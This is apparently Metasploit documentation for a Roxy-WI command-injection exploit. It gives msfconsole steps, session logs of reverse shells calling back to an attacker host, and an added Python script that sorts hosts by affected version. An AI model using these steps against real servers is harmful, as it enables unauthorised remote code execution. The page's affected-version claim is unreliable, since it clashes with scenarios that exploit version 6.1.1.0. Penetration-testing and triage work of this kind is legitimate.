metasploit-gs/documentation/modules/exploit/linux/http/roxy_wi_exec.md

## Vulnerable Application

This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user.

Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.
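The only fact this page gives a defender to work with is the affected range: every Roxy-WI release before 6.1.1.0. The helper below, an added example that is not part of the module or of Roxy-WI, turns that sentence into a triage routine over a host inventory. It normalises version strings of differing length (so `6.1.1` and `6.1.1.0` compare equal) and rejects malformed values instead of silently treating them as safe. The hostnames and versions in `SAMPLE_INVENTORY` are constructed for the example.

```python
from typing import Dict, List, Tuple

# First release the page describes as not affected.
FIXED_VERSION = "6.1.1.0"

# Constructed sample inventory (host -> reported Roxy-WI version); not real data.
SAMPLE_INVENTORY: Dict[str, str] = {
    "lb-edge-01": "6.1.0.0",
    "lb-edge-02": "6.1.1",      # shorter form of the fixed release
    "lb-edge-03": "6.1.1.0",
    "lb-lab-01": "5.4.0",
    "lb-lab-02": "6.2.0.0",
}


def parse_version(version: str) -> Tuple[int, ...]:
    """Parse a dotted Roxy-WI version into a comparable tuple.

    Missing trailing components are treated as 0, so "6.1.1" == "6.1.1.0".
    Raises ValueError on anything that is not purely numeric dotted form,
    so an unparseable value is never mistaken for a patched install.
    """
    parts = version.strip().split(".")
    if not parts or any(not p.isdigit() for p in parts):
        raise ValueError(f"unrecognised version string: {version!r}")
    numbers = [int(p) for p in parts]
    while len(numbers) < 4:
        numbers.append(0)
    return tuple(numbers)


def is_affected(version: str) -> bool:
    """True when the version is strictly older than the fixed release."""
    return parse_version(version) < parse_version(FIXED_VERSION)


def triage(inventory: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (host, version) pairs that still run an affected release."""
    return sorted((host, v) for host, v in inventory.items() if is_affected(v))


if __name__ == "__main__":
    for host, version in triage(SAMPLE_INVENTORY):
        print(f"{host}: Roxy-WI {version} is below {FIXED_VERSION}, upgrade required")
```

Lexicographic tuple comparison is what makes `5.4.0` sort below `6.1.1.0` and `6.2.0.0` above it; comparing the raw strings would get `10.x` versus `6.x` wrong, which is why the numbers are parsed first.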

## Setup

Roxy-WI requires Python and a web server to run. Visit the following URL for the required Python version and the other packages it depends on:

https://roxy-wi.org/installation.py#manual

```
# clone into the web root; the commands that follow use paths relative to /var/www
git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
cd /var/www
chmod +x haproxy-wi/app/*.py
sudo ./haproxy-wi/app/create_db.py
# hand the tree to the web server user (requires root)
sudo chown -R www-data:www-data haproxy-wi
```

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/roxy_wi_exec`
4. Set `RHOST` to the address of the target Roxy-WI machine.
5. Set `LHOST` to the address of your attacking machine.
6. Run exploit
7. Do: `run`
8. You should get a shell as the user running the Roxy-WI server.

## Targets

- **0**: This executes a Unix command.
- **1**: This uses a Linux dropper to execute code.

## Options

### TARGETURI

The base path to Roxy-WI. The default value is `/`.

## Scenarios

### Roxy-WI 6.1.1.0 Ubuntu 20.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Python Meterpreter Payload

```
msf6 > use exploit/linux/http/roxy_wi_exec
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Executing Automatic for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (40168 bytes) to 192.168.56.116
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:56156) at 2022-07-25 18:49:54 +0300

meterpreter > 
```

### Roxy-WI 6.1.1.0 Ubuntu 20.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Linux CMD Payload

```
msf6 > use exploit/linux/http/roxy_wi_exec 
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/http/roxy_wi_exec) > run
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.56.116:443 is vulnerable!
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.116:37396) at 2022-07-21 13:50:23 +0300
[+] Exploit successfully executed.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```